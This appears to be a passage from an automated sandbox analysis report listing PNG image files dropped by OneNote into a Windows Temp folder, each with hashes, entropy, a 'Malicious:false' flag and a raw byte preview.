                                                                                                                                                                                                          Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{4EB65E50-D930-427B-9ABC-4949BD22158F}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{50014A77-563C-4605-BD6E-DE6CCCBF8A51}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{51327C24-A193-47EA-B0C5-5DB7CE49AB5B}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{532AA603-2E2B-4AD2-8369-C54905451BB0}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{5547D516-0AAB-4A5F-A636-8DEC20E7A92F}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{55EA0DB5-4E81-4ABF-9D1E-A7756DA0A62F}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{55F7C939-084F-48A2-964B-81CE71F6A356}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{58E496F3-2CC0-4FD3-92F0-893490CB6142}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{5996238D-B30D-4480-8FA5-7BCD53798029}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{59D4E33D-7A35-47CB-9E22-67B9851147AE}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{5B3B979E-E3F0-463C-85C5-413A86302178}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{5E090E6F-C013-4BC7-AFD5-60E462C363EB}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
